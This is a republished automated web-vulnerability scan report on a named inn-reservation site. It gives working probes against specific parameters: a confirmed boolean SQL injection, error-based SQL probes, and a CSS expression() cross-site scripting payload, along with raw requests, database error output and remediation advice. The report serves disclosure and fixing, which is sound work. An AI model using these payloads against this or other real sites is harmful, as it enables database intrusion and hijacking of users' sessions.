Blind SQL Injection, XSS, Cross Site Scripting in superinn.com, CWE-79, CAPEC-86, DORK, GHDB REPORT SUMMARY

Public Domain Vulnerability Information, Security Articles, Vulnerability Reports, GHDB, DORK Search

XSS Home | XSS Crawler | SQLi Crawler | HTTPi Crawler | FI Crawler |

Loading

Netsparker - Scan Report Summary
TARGET URL
https://www.superinn.com/copy1/webview.asp?cr...
SCAN DATE
8/11/2011 8:04:27 PM
REPORT DATE
8/12/2011 7:51:50 PM
SCAN DURATION
00:45:20

Total Requests

Average Speed

req/sec.
67
identified
9
confirmed
5
critical
4
informational

SCAN SETTINGS

Scan Settings
PROFILE
Previous Settings
ENABLED ENGINES
Static Tests, Find Backup Files, Blind Command Injection, Blind SQL Injection, Boolean SQL Injection, Command Injection, HTTP Header Injection, Local File Inclusion, Open Redirection, Remote Code Evaluation, Remote File Inclusion, SQL Injection, Cross-site Scripting
Authentication
Scheduled

VULNERABILITIES

Vulnerabilities
Netsparker - Web Application Security Scanner
CRITICAL
7 %
IMPORTANT
39 %
MEDIUM
40 %
LOW
7 %
INFORMATION
6 %

VULNERABILITY SUMMARY

Vulnerability Summary
URL Parameter Method Vulnerability Confirmed
/copy1/1letin.asp text2 POST [Probable] SQL Injection No
/copy1/Images/ Forbidden Resource Yes
/copy1/Res_1.asp crypt GET Cross-site Scripting No
crypt GET Cross-site Scripting No
mdate GET Cross-site Scripting No
rnum GET Cross-site Scripting No
crypt GET [Possible] Cross-site Scripting No
crypt GET [Possible] Cross-site Scripting No
mdate GET [Possible] Cross-site Scripting No
rnum GET [Possible] Cross-site Scripting No
/copy1/res_1_B.asp rnum POST [Probable] SQL Injection No
rnum POST [Probable] SQL Injection No
crypt GET Cross-site Scripting No
crypt GET Cross-site Scripting No
crypt GET Cross-site Scripting No
crypt GET [Possible] Cross-site Scripting No
crypt GET [Possible] Cross-site Scripting No
crypt GET [Possible] Cross-site Scripting No
/copy1/res_1_BNR.asp crypt GET Cross-site Scripting No
crypt GET Cross-site Scripting No
crypt GET Cross-site Scripting No
crypt GET [Possible] Cross-site Scripting No
crypt GET [Possible] Cross-site Scripting No
crypt GET [Possible] Cross-site Scripting No
Internal Server Error Yes
Programming Error Message No
/copy1/Res_2.asp crypt GET Cross-site Scripting No
crypt GET [Possible] Cross-site Scripting No
/copy1/Res_2Send.asp crypt GET Cross-site Scripting No
crypt GET Cross-site Scripting No
crypt GET [Possible] Cross-site Scripting No
crypt GET [Possible] Cross-site Scripting No
/copy1/Res_3.asp crypt GET Cross-site Scripting No
crypt GET [Possible] Cross-site Scripting No
/copy1/res_avail.asp crypt GET Cross-site Scripting No
crypt GET Cross-site Scripting No
crypt GET Cross-site Scripting No
crypt GET Cross-site Scripting No
crypt GET Cross-site Scripting No
crypt GET Cross-site Scripting No
crypt GET [Possible] Cross-site Scripting No
crypt GET [Possible] Cross-site Scripting No
crypt GET [Possible] Cross-site Scripting No
crypt GET [Possible] Cross-site Scripting No
crypt GET [Possible] Cross-site Scripting No
crypt GET [Possible] Cross-site Scripting No
/copy1/ResMain.asp crypt GET Cross-site Scripting No
crypt GET [Possible] Cross-site Scripting No
/copy1/webroom.asp Rnum GET Boolean Based SQL Injection Yes
Rnum GET [Probable] SQL Injection No
crypt GET Cross-site Scripting No
crypt GET [Possible] Cross-site Scripting No
Database Error Message No
Microsoft Access Identified Yes
/copy1/webview.asp crypt GET Cross-site Scripting No
Cookie Not Marked As Secure Yes
Insecure Transportation Security Protocol (SSLv2) Supported Yes
Weak Ciphers Detected Yes
crypt GET [Possible] Cross-site Scripting No
Cookie Not Marked As HttpOnly Yes
TRACE / TRACK Identified Yes
E-mail Address Disclosure No
IIS Version Disclosure No
/copy1/webviewstyle.asp crypt GET Cross-site Scripting No
crypt GET [Possible] Cross-site Scripting No
/copy1/wrong.asp crypt GET Cross-site Scripting No
crypt GET [Possible] Cross-site Scripting No
Boolean Based SQL Injection

Boolean Based SQL Injection

1 TOTAL
CRITICAL
CONFIRMED
1
SQL Injection occurs when data input for example by a user is interpreted as a SQL command rather than normal data by the backend database. This is an extremely common vulnerability and its successful exploitation can have critical implications. Netsparker confirmed the vulnerability by executing a test SQL Query on the back-end database. In these tests, SQL Injection was not obvious but the different responses from the page based on the injection test allowed Netsparker to identify and confirm the SQL Injection.

Impact

Depending on the backend database, the database connection settings and the operating system, an attacker can mount one or more of the following type of attacks successfully:
  • Reading, Updating and Deleting arbitrary data from the database
  • Executing commands on the underlying operating system
  • Reading, Updating and Deleting arbitrary tables from the database

Actions to Take

  1. See the remedy for solution.
  2. If you are not using a database access layer (DAL), consider using one. This will help you to centralise the issue. You can also use an ORM (object relational mapping). Most of the ORM systems use only parameterised queries and this can solve the whole SQL Injection problem.
  3. Locate all of the dynamically generated SQL queries and convert them to parameterised queries. (If you decide to use a DAL/ORM change all legacy code to use these new libraries)
  4. Use your weblogs and application logs to see if there was any previous but undetected attack to this resource.

Remedy

The best way to protect your code against SQL Injections is using parameterised queries (prepared statements). Almost all modern languages provide built in libraries for this. Wherever possible do not create dynamic SQL queries or SQL queries with string concatenation.

Required Skills for Successful Exploitation

There are numerous freely available tools to exploit SQL Injection vulnerabilities. This is a complex area with many dependencies, however it should be noted that the numerous resources available in this area have raised both attacker awareness of the issues and their ability to discover and leverage them.

External References

Remedy References

Classification

OWASP A1 PCI v1.2-6.5.2 PCI v2.0-6.5.1 CWE-89 CAPEC-66 WASC-19
- /copy1/webroom.asp

/copy1/webroom.asp CONFIRMED

https://www.superinn.com/copy1/webroom.asp?crypt=%BF%7Fp%5B%98%BB%B4%B2%A6%98b%7FkP%C1%A8%A6%9A%C1%7..

Parameters

Parameter Type Value
crypt GET �p[������bkP�����}X���ǯ�|
Rnum GET -1 OR 17-7=10

Request

GET /copy1/webroom.asp?crypt=%BF%7Fp%5B%98%BB%B4%B2%A6%98b%7FkP%C1%A8%A6%9A%C1%7DX%B2%9A%B9%C7%AF%AA%7C&Rnum=-1+OR+17-7%3d10 HTTP/1.1
Referer: https://www.superinn.com/copy1/res_avail.asp?crypt=%BF%7Fp%5B%98%BB%B4%B2%A6%98b%7FkP%C1%A8%A6%9A%C1%7DX%B2%9A%B9%C7%AF%AA%7C
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.superinn.com
Cookie: ASPSESSIONIDCADAAARA=FJDOLOPAFCLNHGBMFFHFHCPM
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Fri, 12 Aug 2011 04:03:34 GMT
X-Powered-By: ASP.NET
Content-Length: 2389
Content-Type: text/html
Cache-control: private



<html>
<head>
<title>Room Description and Photos</title>
<style>
body {}
A
{
color: #FFFFFF;
TEXT-DECORATION: none
}
A:hover
{
color: #ffffff;
TEXT-DECORATION:none
}
</style>
</head>

<body onload="javascript:window.focus();" leftmargin="0" topmargin="0" marginwidth="0" marginheight="0" link='#000000' alink='#000000' vlink='#000000' bgcolor='#ffffff' text='#000000' background='https://www.superinn.com/db/381/webview/'>


<table width="100%" border="0" cellspacing="0" cellpadding="0" bgColor=''>
<Tr>
<td width='0'>
</td>
<td>
<TABLE width="100%" height="20" border="0" cellPadding=0 cellSpacing=0 bgColor=''>
<TBODY>
<TR>
<TD>
<b><font face="Arial, Helvetica, sans-serif" size="2" color='#000000'>&nbsp;&nbsp;&nbsp;&nbsp;Room 1-The Victorian </B></FONT>


<td width=40>&nbsp;
<TD width=40>
<DIV align=center><a href="javascript:top.close()" target="_self">
<b><font face="Arial, Helvetica, sans-serif" size="2" color='#000000'>Exit </B></FONT></a></DIV>
<td width=40>&nbsp;

<TD width=1></TD></TR></TBODY></TABLE>
</td>
</tr>
</table>

<TABLE width="100%" height=260 border="0" cellPadding=0 cellSpacing=0 bgColor=''>
<TBODY>
<TR>
<TD align=middle>
<img src='../db/381/images/1a.jpg' height="250">

</TD>

</TR></TBODY></TABLE>
<table width="100%" border="0" cellspacing="0" cellpadding="10" bgColor=''>
<tr><td>
<b><font face="Arial, Helvetica, sans-serif" size="2" color='#000000'>
Room Description:</b><br>
This Victorian styled room has a queen canopy bed, gas fireplace, antique furnishings, private bath, shared sundeck, skylight.

</td></tr>
</table>
<table width="100%" border="0" cellspacing="0" cellpadding="0" bgColor=''>
<Tr>
<td width='0'>
</td>
<td>
<TABLE width="100%" height="20" border="0" cellPadding=0 cellSpacing=0 bgColor=''>
<TBODY>
<TR>
<TD>
<b><font face="Arial, Helvetica, sans-serif" size="2" color='#000000'>&nbsp;&nbsp;&nbsp;&nbsp;Room 1-The Victorian </B></FONT>


<td width=40>&nbsp;
<TD width=40>
<DIV align=center><a href="javascript:top.close()" target="_self">
<b><font face="Arial, Helvetica, sans-serif" size="2" color='#000000'>Exit </B></FONT></a></DIV>
<td width=40>&nbsp;

<TD width=1></TD></TR></TBODY></TABLE>
</td>
</tr>
</table>




</body>
</html>

[Probable] SQL Injection

[Probable] SQL Injection

4 TOTAL
CRITICAL
SQL Injection occurs when data input for example by a user is interpreted as a SQL command rather than normal data by the backend database. This is an extremely common vulnerability and its successful exploitation can have critical implications. Even though Netsparker believes that there is a SQL Injection in here it could not confirm it. There can be numerous reasons for Netsparker not being able to confirm this. We strongly recommend investigating the issue manually to ensure that it is an SQL Injection and that it needs to be addressed. You can also consider sending the details of this issue to us, in order that we can address this issue for the next time and give you a more precise result.

Impact

Depending on the backend database, database connection settings and the operating system, an attacker can mount one or more of the following type of attacks successfully:
  • Reading, Updating and Deleting arbitrary data from the database
  • Executing commands on the underlying operating system
  • Reading, Updating and Deleting arbitrary tables from the database

Actions to Take

  1. See the remedy for solution.
  2. If you are not using a database access layer (DAL) within the architecture consider its benefits and implement if appropriate. As a minimum the use of s DAL will help centralize the issue and its resolution. You can also use an ORM (object relational mapping). Most ORM systems use parameterized queries and this can solve many if not all SQL Injection based problems.
  3. Locate all of the dynamically generated SQL queries and convert them to parameterised queries. (If you decide to use a DAL/ORM, change all legacy code to use these new libraries)
  4. Monitor and review weblogs and application logs in order to uncover active or previous exploitation attempts.

Remedy

A very robust method for mitigating the threat of SQL Injection based vulnerabilities is to use parameterized queries (prepared statements). Almost all modern languages provide built in libraries for this. Wherever possible do not create dynamic SQL queries or SQL queries with string concatenation.

Required Skills for Successful Exploitation

There are numerous freely available tools to test for SQL Injection vulnerabilities. This is a complex area with many dependencies, however it should be noted that the numerous resources available in this area have raised both attacker awareness of the issues and their ability to discover and leverage them. SQL Injection is one of the most common web application vulnerabilities.

External References

Remedy References

Classification

OWASP A1 PCI v1.2-6.5.2 PCI v2.0-6.5.1 CWE-89 CAPEC-66 WASC-19
- /copy1/1letin.asp

/copy1/1letin.asp

https://www.superinn.com/copy1/1letin.asp

Parameters

Parameter Type Value
text1 POST 3
text2 POST '+ convert(int,(CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97))) +'
Submit POST Login

Request

POST /copy1/1letin.asp HTTP/1.1
Referer: https://www.superinn.com/copy1/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.superinn.com
Cookie: ASPSESSIONIDCADAAARA=MBDOLOPADOELCGIFCEGGLPMB
Content-Length: 180
Expect: 100-continue
Accept-Encoding: gzip, deflate

text1=3&text2='%2B%20convert(int,(CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97)))%20%2B'&Submit=Login

Response

HTTP/1.1 500 Internal Server Error
Server: Microsoft-IIS/5.0
Date: Fri, 12 Aug 2011 04:03:17 GMT
X-Powered-By: ASP.NET
Content-Length: 316
Content-Type: text/html
Cache-control: private



<HTML>
<body>
<font face="Arial" size=2><p>Microsoft JET Database Engine</font> <font face="Arial" size=2>error '80040e14'</font><p><font face="Arial" size=2>Undefined function 'convert' in expression.</font><p><font face="Arial" size=2>/copy1/1letin.asp</font><font face="Arial" size=2>, line 25</font>
- /copy1/webroom.asp

/copy1/webroom.asp

https://www.superinn.com/copy1/webroom.asp?crypt=%BF%7Fp%5B%98%BB%B4%B2%A6%98b%7FkP%C1%A8%A6%9A%C1%7..

Parameters

Parameter Type Value
crypt GET �p[������bkP�����}X���ǯ�|
Rnum GET convert(int,(CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)))

Request

GET /copy1/webroom.asp?crypt=%BF%7Fp%5B%98%BB%B4%B2%A6%98b%7FkP%C1%A8%A6%9A%C1%7DX%B2%9A%B9%C7%AF%AA%7C&Rnum=convert(int,(CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))) HTTP/1.1
Referer: https://www.superinn.com/copy1/res_avail.asp?crypt=%BF%7Fp%5B%98%BB%B4%B2%A6%98b%7FkP%C1%A8%A6%9A%C1%7DX%B2%9A%B9%C7%AF%AA%7C
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.superinn.com
Cookie: ASPSESSIONIDCADAAARA=FJDOLOPAFCLNHGBMFFHFHCPM
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 500 Internal Server Error
Server: Microsoft-IIS/5.0
Date: Fri, 12 Aug 2011 04:03:53 GMT
X-Powered-By: ASP.NET
Content-Length: 509
Content-Type: text/html
Cache-control: private



<html>
<head>
<title>Room Description and Photos</title>
<style>
body {}
A
{
color: #FFFFFF;
TEXT-DECORATION: none
}
A:hover
{
color: #ffffff;
TEXT-DECORATION:none
}
</style>
</head>
<font face="Arial" size=2><p>Microsoft JET Database Engine</font> <font face="Arial" size=2>error '80040e14'</font><p><font face="Arial" size=2>Undefined function 'convert' in expression.</font><p><font face="Arial" size=2>/copy1/webroom.asp</font><font face="Arial" size=2>, line 307</font>
- /copy1/res_1_B.asp

/copy1/res_1_B.asp

https://www.superinn.com/copy1/res_1_B.asp?crypt=%BF%7Fp%5B%98%BB%B4%B2%A6%98b%7FkP%C1%A8%A6%9A%C1%7..

Parameters

Parameter Type Value
crypt GET �p[������bkP�����}X���ǯ�|
text1 POST 8/14/2011
text2 POST 3
text3 POST 2
Submit POST CHECK AVAILABILITY
BUTTON POST RETURN TO CHART
rnum POST %27

Request

POST /copy1/res_1_B.asp?crypt=%BF%7Fp%5B%98%BB%B4%B2%A6%98b%7FkP%C1%A8%A6%9A%C1%7DX%B2%9A%B9%C7%AF%AA%7C HTTP/1.1
Referer: https://www.superinn.com/copy1/Res_1.asp?crypt=%BF%7Fp%5B%98%BB%B4%B2%A6%98b%7FkP%C1%A8%A6%9A%C1%7DX%B2%9A%B9%C7%AF%AA%7C&mdate=8/14/2011&rnum=1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.superinn.com
Cookie: ASPSESSIONIDCADAAARA=NNEOLOPACIJJPGIHLLPPAKFH
Content-Length: 95
Expect: 100-continue
Accept-Encoding: gzip, deflate

text1=8%2f14%2f2011&text2=3&text3=2&Submit=CHECK+AVAILABILITY&BUTTON=RETURN+TO+CHART&rnum=%2527

Response

HTTP/1.1 500 Internal Server Error
Server: Microsoft-IIS/5.0
Date: Fri, 12 Aug 2011 04:21:58 GMT
X-Powered-By: ASP.NET
Content-Length: 5404
Content-Type: text/html
Cache-control: private



<html>
<head>
<link rel="stylesheet" href="webviewstyle.asp?crypt=%BF%7Fp%5B%98%BB%B4%B2%A6%98b%7FkP%C1%A8%A6%9A%C1%7DX%B2%9A%B9%C7%AF%AA%7C" type="text/css">
<title>Online Reservations and Availability</title>
<script>
var statusmsg=""

function hidestatus(){
window.status=statusmsg
return true
}

</script>

<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"></head>
<body>
<br><TABLE cellSpacing=0 cellPadding=0 width=745 align=center border=0>
<TBODY>
<TR>
<TD><IMG height=1
src="https://www.superinn.com/db/381/webview/spacer.gif"
width=16 border=0></TD>
<TD><IMG height=1
src="https://www.superinn.com/db/381/webview/spacer.gif"
width=54 border=0></TD>
<TD><IMG height=1
src="https://www.superinn.com/db/381/webview/spacer.gif"
width=58 border=0></TD>
<TD><IMG height=1
src="https://www.superinn.com/db/381/webview/spacer.gif"
width=112 border=0></TD>
<TD><IMG height=1
src="https://www.superinn.com/db/381/webview/spacer.gif"
width=109 border=0></TD>
<TD><IMG height=1
src="https://www.superinn.com/db/381/webview/spacer.gif"
width=82 border=0></TD>
<TD><IMG height=1
src="https://www.superinn.com/db/381/webview/spacer.gif"
width=135 border=0></TD>
<TD><IMG height=1
src="https://www.superinn.com/db/381/webview/spacer.gif"
width=156 border=0></TD>
<TD><IMG height=1
src="https://www.superinn.com/db/381/webview/spacer.gif"
width=17 border=0></TD>
<TD><IMG height=1
src="https://www.superinn.com/db/381/webview/spacer.gif"
width=6 border=0></TD>
<TD><IMG height=1
src="https://www.superinn.com/db/381/webview/spacer.gif"
width=1 border=0></TD></TR>
<TR>
<TD colSpan=10><IMG height=75
alt="Hanover House Inn on Martha's Vineyard - Arrive as Strangers, Leave as Friends. 800-339-1066"
src="https://www.superinn.com/db/381/webview/top.jpg"
width=745 border=0 name=top></TD>
<TD><IMG height=75
src="https://www.superinn.com/db/381/webview/spacer.gif"
width=1 border=0></TD></TR>
<TR>
<TD vAlign=top
background="https://www.superinn.com/db/381/webview/left.jpg"><IMG
height=29
src="https://www.superinn.com/db/381/webview/topleft.jpg"
width=16 border=0 name=topleft></TD>
<TD align=left
background="https://www.superinn.com/db/381/webview/template2_r2_c9.jpg"
colSpan=8>
<A target="_top"
href="http://www.hanoverhouseinn.com/index.shtml"><IMG height=29
alt="Hanover House Home Page"
src="https://www.superinn.com/db/381/webview/home.jpg"
width=54 border=0 name=home></A><A target="_top"
href="http://www.hanoverhouseinn.com/rates.shtml"><IMG height=29 alt=Rates
src="https://www.superinn.com/db/381/webview/rates.jpg"
width=58 border=0 name=rates></A><A target="_top"
href="http://www.hanoverhouseinn.com/specials.shtml"><IMG height=29
alt="Special Offers at the Hanover House B&amp;B"
src="https://www.superinn.com/db/381/webview/specials.jpg"
width=112 border=0 name=specials></A><A target="_top"
href="http://www.hanoverhouseinn.com/rooms.shtml"><IMG height=29
alt="Guest Rooms"
src="https://www.superinn.com/db/381/webview/rooms.jpg"
width=109 border=0 name=rooms></A><A target="_top"
href="http://www.hanoverhouseinn.com/location.shtml"><IMG height=29
alt="Where we are located on Martha's Vineyard"
src="https://www.superinn.com/db/381/webview/location.jpg"
width=82 border=0 name=mlocation></A><A
onclick="MM_openBrWindow('http://www.hanoverhouseinn.com/brochure.shtml','','menubar=yes,scrollbars=yes,resizable=yes,width=590,height=400')"
href="javascript:;"><IMG height=29
alt="Click here for a printable brochure"
src="https://www.superinn.com/db/381/webview/print.jpg"
width=135 border=0 name=print></A><A target="_top"
href="https://www.superinn.com/webview1.asp?dk=The_Hanover_House"
target=_blank><IMG height=29 alt="Online Reservations"
src="https://www.superinn.com/db/381/webview/onlinereservations.jpg"
width=156 border=0 name=onlinereservations></A> </TD>
<TD vAlign=top
background="https://www.superinn.com/db/381/webview/right.jpg"><IMG
height=29
src="https://www.superinn.com/db/381/webview/topright.jpg"
width=6 border=0 name=topright></TD>
<TD><IMG height=29
src="https://www.superinn.com/db/381/webview/spacer.gif"
width=1 border=0></TD></TR>
<TR>
<TD
background="https://www.superinn.com/db/381/webview/left.jpg"><IMG
height=392
src="https://www.superinn.com/db/1/webview/left.jpg"
width=16 border=0 name=left></TD>
<TD vAlign=top bgColor=#ffffff colSpan=8 rowSpan=2>
<div align="center"><br><img src='../db/381/webview//nav2.gif'><br><br>




<font face="Arial" size=2><p>Microsoft JET Database Engine</font> <font face="Arial" size=2>error '80040e14'</font><p><font face="Arial" size=2>Syntax error in query expression 'rnum=%27'.</font><p><font face="Arial" size=2>/copy1/res_1_B.asp</font><font face="Arial" size=2>, line 46</font>
- /copy1/res_1_B.asp

/copy1/res_1_B.asp

https://www.superinn.com/copy1/res_1_B.asp?crypt=%BF%7Fp%5B%98%BB%B4%B2%A6%98b%7FkP%C1%A8%A6%9A%C1%7..

Parameters

Parameter Type Value
crypt GET �p[������bkP�����}X���ǯ�|
text1 POST 8/14/2011
text2 POST 3
text3 POST 2
Submit POST CHECK AVAILABILITY
rnum POST %27

Request

POST /copy1/res_1_B.asp?crypt=%BF%7Fp%5B%98%BB%B4%B2%A6%98b%7FkP%C1%A8%A6%9A%C1%7DX%B2%9A%B9%C7%AF%AA%7C HTTP/1.1
Referer: https://www.superinn.com/copy1/Res_1.asp?crypt=%BF%7Fp%5B%98%BB%B4%B2%A6%98b%7FkP%C1%A8%A6%9A%C1%7DX%B2%9A%B9%C7%AF%AA%7C&mdate=8/14/2011&rnum=1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.superinn.com
Cookie: ASPSESSIONIDCADAAARA=JFGOLOPAALLCHINFEDBMAEHE
Content-Length: 72
Expect: 100-continue
Accept-Encoding: gzip, deflate

text1=8%2f14%2f2011&text2=3&text3=2&Submit=CHECK+AVAILABILITY&rnum=%2527

Response

HTTP/1.1 500 Internal Server Error
Server: Microsoft-IIS/5.0
Date: Fri, 12 Aug 2011 04:24:20 GMT
X-Powered-By: ASP.NET
Content-Length: 5404
Content-Type: text/html
Cache-control: private



<html>
<head>
<link rel="stylesheet" href="webviewstyle.asp?crypt=%BF%7Fp%5B%98%BB%B4%B2%A6%98b%7FkP%C1%A8%A6%9A%C1%7DX%B2%9A%B9%C7%AF%AA%7C" type="text/css">
<title>Online Reservations and Availability</title>
<script>
var statusmsg=""

function hidestatus(){
window.status=statusmsg
return true
}

</script>

<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"></head>
<body>
<br><TABLE cellSpacing=0 cellPadding=0 width=745 align=center border=0>
<TBODY>
<TR>
<TD><IMG height=1
src="https://www.superinn.com/db/381/webview/spacer.gif"
width=16 border=0></TD>
<TD><IMG height=1
src="https://www.superinn.com/db/381/webview/spacer.gif"
width=54 border=0></TD>
<TD><IMG height=1
src="https://www.superinn.com/db/381/webview/spacer.gif"
width=58 border=0></TD>
<TD><IMG height=1
src="https://www.superinn.com/db/381/webview/spacer.gif"
width=112 border=0></TD>
<TD><IMG height=1
src="https://www.superinn.com/db/381/webview/spacer.gif"
width=109 border=0></TD>
<TD><IMG height=1
src="https://www.superinn.com/db/381/webview/spacer.gif"
width=82 border=0></TD>
<TD><IMG height=1
src="https://www.superinn.com/db/381/webview/spacer.gif"
width=135 border=0></TD>
<TD><IMG height=1
src="https://www.superinn.com/db/381/webview/spacer.gif"
width=156 border=0></TD>
<TD><IMG height=1
src="https://www.superinn.com/db/381/webview/spacer.gif"
width=17 border=0></TD>
<TD><IMG height=1
src="https://www.superinn.com/db/381/webview/spacer.gif"
width=6 border=0></TD>
<TD><IMG height=1
src="https://www.superinn.com/db/381/webview/spacer.gif"
width=1 border=0></TD></TR>
<TR>
<TD colSpan=10><IMG height=75
alt="Hanover House Inn on Martha's Vineyard - Arrive as Strangers, Leave as Friends. 800-339-1066"
src="https://www.superinn.com/db/381/webview/top.jpg"
width=745 border=0 name=top></TD>
<TD><IMG height=75
src="https://www.superinn.com/db/381/webview/spacer.gif"
width=1 border=0></TD></TR>
<TR>
<TD vAlign=top
background="https://www.superinn.com/db/381/webview/left.jpg"><IMG
height=29
src="https://www.superinn.com/db/381/webview/topleft.jpg"
width=16 border=0 name=topleft></TD>
<TD align=left
background="https://www.superinn.com/db/381/webview/template2_r2_c9.jpg"
colSpan=8>
<A target="_top"
href="http://www.hanoverhouseinn.com/index.shtml"><IMG height=29
alt="Hanover House Home Page"
src="https://www.superinn.com/db/381/webview/home.jpg"
width=54 border=0 name=home></A><A target="_top"
href="http://www.hanoverhouseinn.com/rates.shtml"><IMG height=29 alt=Rates
src="https://www.superinn.com/db/381/webview/rates.jpg"
width=58 border=0 name=rates></A><A target="_top"
href="http://www.hanoverhouseinn.com/specials.shtml"><IMG height=29
alt="Special Offers at the Hanover House B&amp;B"
src="https://www.superinn.com/db/381/webview/specials.jpg"
width=112 border=0 name=specials></A><A target="_top"
href="http://www.hanoverhouseinn.com/rooms.shtml"><IMG height=29
alt="Guest Rooms"
src="https://www.superinn.com/db/381/webview/rooms.jpg"
width=109 border=0 name=rooms></A><A target="_top"
href="http://www.hanoverhouseinn.com/location.shtml"><IMG height=29
alt="Where we are located on Martha's Vineyard"
src="https://www.superinn.com/db/381/webview/location.jpg"
width=82 border=0 name=mlocation></A><A
onclick="MM_openBrWindow('http://www.hanoverhouseinn.com/brochure.shtml','','menubar=yes,scrollbars=yes,resizable=yes,width=590,height=400')"
href="javascript:;"><IMG height=29
alt="Click here for a printable brochure"
src="https://www.superinn.com/db/381/webview/print.jpg"
width=135 border=0 name=print></A><A target="_top"
href="https://www.superinn.com/webview1.asp?dk=The_Hanover_House"
target=_blank><IMG height=29 alt="Online Reservations"
src="https://www.superinn.com/db/381/webview/onlinereservations.jpg"
width=156 border=0 name=onlinereservations></A> </TD>
<TD vAlign=top
background="https://www.superinn.com/db/381/webview/right.jpg"><IMG
height=29
src="https://www.superinn.com/db/381/webview/topright.jpg"
width=6 border=0 name=topright></TD>
<TD><IMG height=29
src="https://www.superinn.com/db/381/webview/spacer.gif"
width=1 border=0></TD></TR>
<TR>
<TD
background="https://www.superinn.com/db/381/webview/left.jpg"><IMG
height=392
src="https://www.superinn.com/db/1/webview/left.jpg"
width=16 border=0 name=left></TD>
<TD vAlign=top bgColor=#ffffff colSpan=8 rowSpan=2>
<div align="center"><br><img src='../db/381/webview//nav2.gif'><br><br>




<font face="Arial" size=2><p>Microsoft JET Database Engine</font> <font face="Arial" size=2>error '80040e14'</font><p><font face="Arial" size=2>Syntax error in query expression 'rnum=%27'.</font><p><font face="Arial" size=2>/copy1/res_1_B.asp</font><font face="Arial" size=2>, line 46</font>
Cross-site Scripting

Cross-site Scripting

25 TOTAL
IMPORTANT
XSS (Cross-site Scripting) allows an attacker to execute a dynamic script (Javascript, VbScript) in the context of the application. This allows several different attack opportunities, mostly hijacking the current session of the user or changing the look of the page by changing the HTML on the fly to steal the user's credentials. This happens because the input entered by a user has been interpreted as HTML/Javascript/VbScript by the browser.

XSS targets the users of the application instead of the server. Although this is a limitation, since it allows attackers to hijack other users' session, an attacker might attack an administrator to gain full control over the application.

Impact

There are many different attacks that can be leveraged through the use of XSS, including:
  • Hi-jacking users' active session
  • Changing the look of the page within the victims browser.
  • Mounting a successful phishing attack.
  • Intercept data and perform man-in-the-middle attacks.

Remedy

The issue occurs because the browser interprets the input as active HTML, Javascript or VbScript. To avoid this, all input and output from the application should be filtered. Output should be filtered according to the output format and location. Typically the output location is HTML. Where the output is HTML ensure that all active content is removed prior to its presentation to the server.

Prior to sanitizing user input, ensure you have a pre-defined list of both expected and acceptable characters with which you populate a white-list. This list needs only be defined once and should be used to sanitize and validate all subsequent input.

There are a number of pre-defined, well structured white-list libraries available for many different environments, good examples of these include, OWASP Reform and Microsoft Anti Cross-site Scripting libraries are good examples.

Remedy References

External References

Classification

OWASP A2 PCI v1.2-6.5.1 PCI v2.0-6.5.7 CWE-79 CAPEC-19 WASC-08
- /copy1/webview.asp

/copy1/webview.asp

https://www.superinn.com/copy1/webview.asp?crypt=%3C/a%20style=x:expre/**/ssion(alert(0x000118))%3E

Parameters

Parameter Type Value
crypt GET </a style=x:expre/**/ssion(alert(0x000118))>

Request

GET /copy1/webview.asp?crypt=%3C/a%20style=x:expre/**/ssion(netsparker(0x000118))%3E HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.superinn.com
Cookie: ASPSESSIONIDCADAAARA=MBDOLOPADOELCGIFCEGGLPMB
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
